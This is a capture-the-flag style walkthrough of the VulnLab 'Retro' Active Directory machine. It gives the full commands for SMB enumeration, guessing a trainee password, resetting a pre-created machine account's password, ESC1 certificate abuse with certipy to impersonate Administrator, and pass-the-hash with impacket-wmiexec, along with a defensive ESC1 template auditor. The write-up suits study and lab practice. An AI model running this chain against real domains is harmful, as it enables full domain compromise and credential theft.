Where Notes Work
RETRO – VULNLAB
This is the Write-up/Walkthrough of the RETRO Active Directory Machine from VULNLAB.
Note: the IP address differs between some commands because the machine gets a new IP every time it is stopped and started.
NMAP SCAN:
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-08-14 18:32:06Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
SNIP
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.re
3269/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: RETRO
| NetBIOS_Domain_Name: RETRO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: retro.vl
| DNS_Computer_Name: DC.retro.vl
| Product_Version: 10.0.20348
|_ System_Time: 2023-08-14T18:32:48+00:00
|_ssl-date: 2023-08-14T18:33:28+00:00; +2s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 12722/tcp): CLEAN (Timeout)
| Check 2 (port 26063/tcp): CLEAN (Timeout)
| Check 3 (port 31296/udp): CLEAN (Timeout)
| Check 4 (port 53820/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2023-08-14T18:32:49
|_ start_date: N/A
|_clock-skew: mean: 1s, deviation: 0s, median: 0s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Domain: retro.vl, NetBIOS name: DC
Enumerating SMB shares, I found that only the Trainees share is readable without credentials. It contains a file named Important.txt, which says:
Dear Trainees,
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.
Regards
The Admins
The message says that everyone is struggling with strong and unique passwords, so the admins bundled them all into one account, which may well have an easy password.
Enumerating users with impacket-lookupsid (lookupsid.py) as an anonymous user with a blank password:
impacket-lookupsid [email protected]
Users found:
trainee
BANKING$
jburley
HelpDesk
tblack
krbtgt
Following the hint in Important.txt, I tried authenticating to SMB with the username “trainee” and the password “trainee”; this worked, and the Notes share is now readable.
Logged in with smbclient and downloaded the ToDo.txt file:
smbclient //10.10.115.87/Notes -U trainee%trainee
The note says:
Thomas,
after convincing the finance department to get rid of their ancient banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.
Best
James
The note talks about a pre-created computer account. Searching for “pre-created computer account” led me to a blog post that explains and demonstrates how pre-created computer accounts can be abused.
I had already found the BANKING$ machine account, so I tried changing its password. Using changepasswd.py with the trainee credentials as the alternative (authenticating) user, I set a new password for the BANKING$ machine account:
python3 changepasswd.py retro.vl/banking$:[email protected] -altuser trainee -altpass trainee -newpass hacker@123
It worked, and the password of the BANKING$ machine account was changed.
After that I tried bloodhound-python with both the trainee and the machine account credentials, but it failed with a DNS error, so I moved on to enumerating certificate templates with certipy:
certipy find -u 'banking$'@retro.vl -p hacker@123 -dc-ip 10.10.115.87
cat 20230815033909_Certipy.txt
The output shows that the “RetroClients” template is vulnerable to ESC1: I am authenticating as a computer account, Domain Computers have enrollment rights on the template, the enrollee supplies the subject, and the template allows client authentication.
Certificate Templates
0
Template Name : RetroClients
Display Name : Retro Clients
Certificate Authorities : retro-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
Object Control Permissions
Owner : RETRO.VL\Administrator
Write Owner Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
Write Dacl Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
Write Property Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
[!] Vulnerabilities
ESC1 : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
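As an added example (not part of the original write-up or of certipy), here is a small Python audit that parses certipy-style template output and flags the ESC1 combination reported above: a broad group such as Domain Computers holding enrollment rights on an enabled template that allows client authentication and lets the enrollee supply the subject, with no manager approval or required signatures. The sample text, the hardened RetroClientsHardened template and the LOW_PRIV group list are constructed assumptions.

```python
import re
# Constructed sample: the RetroClients template as certipy printed it in this
# write-up, followed by a hypothetical hardened copy of the same template.
SAMPLE = """\
Template Name : RetroClients
Enabled : True
Client Authentication : True
Enrollee Supplies Subject : True
Enrollment Rights : RETRO.VL\\Domain Admins
RETRO.VL\\Domain Computers
RETRO.VL\\Enterprise Admins
Object Control Permissions
Template Name : RetroClientsHardened
Enabled : True
Client Authentication : True
Enrollee Supplies Subject : False
Enrollment Rights : RETRO.VL\\Domain Admins
"""
# Broad groups that should not hold enrollment rights on such a template
# (assumption: the domain is RETRO.VL, as in this write-up).
LOW_PRIV = {"RETRO.VL\\Domain Computers", "RETRO.VL\\Domain Users", "RETRO.VL\\Authenticated Users"}
KV = re.compile(r"^([A-Za-z0-9 ]+?)\s*:\s*(.*)$")

def parse_templates(text):
    """Turn certipy-style 'Key : Value' output into one dict per template."""
    templates, collecting = [], False
    for line in (raw.strip() for raw in text.splitlines()):
        m = KV.match(line)
        if m and m.group(1) == "Template Name":
            templates.append({"Enrollment Rights": []})
        if m and templates:
            templates[-1][m.group(1)] = m.group(2)
            collecting = m.group(1) == "Enrollment Rights"
            if collecting:  # the first principal sits on the key line itself
                templates[-1]["Enrollment Rights"] = [m.group(2)]
        elif collecting and "\\" in line:  # continuation line: one more principal
            templates[-1]["Enrollment Rights"].append(line)
        else:
            collecting = False
    return templates

def esc1_exposure(t):
    """Low-privileged principals able to enroll for an arbitrary-UPN client-auth cert."""
    exposed = (t.get("Enabled") == "True" and t.get("Client Authentication") == "True"
               and t.get("Enrollee Supplies Subject") == "True"
               and t.get("Requires Manager Approval") != "True"
               and t.get("Authorized Signatures Required", "0") == "0")
    return sorted(p for p in t["Enrollment Rights"] if p in LOW_PRIV) if exposed else []

def audit(text):
    """Map template name -> principals that make it ESC1-exposed (empty list = fine)."""
    return {t["Template Name"]: esc1_exposure(t) for t in parse_templates(text)}
```

Removing Domain Computers from the enrollment rights, requiring manager approval, or clearing EnrolleeSuppliesSubject each makes the finding disappear, which is the remediation the template needs.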
I requested a certificate from the “RetroClients” template for the Administrator UPN (User Principal Name), setting the key size to 4096 to satisfy the template's “Minimum RSA Key Length”.
Note: Make sure you have added dc.retro.vl and retro.vl to your /etc/hosts file.
certipy req -u 'banking$'@retro.vl -p 'hacker@123' -c 'retro-DC-CA' -target 'dc.retro.vl' -template 'RetroClients' -upn '[email protected]' -dns 'dc.retro.vl' -key-size 4096 -debug
With the resulting .pfx file (certificate plus private key), I used certipy to authenticate to the DC:
certipy auth -pfx administrator_dc.pfx -dc-ip 10.10.104.45
After running the command, certipy asked me to choose between “UPN” and “DNS Host Name”; I selected UPN by entering 0 and received the NT hash of the administrator account. I then tried logging in over RDP with pass-the-hash, but blank-password logins were not allowed, and evil-winrm did not respond either. There are still many other ways to log in to the administrator account using the hash.
I used impacket-wmiexec to log in as administrator with pass-the-hash (PTH) and got a shell as administrator:
impacket-wmiexec [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389
If you face any problems, let me know in the comments.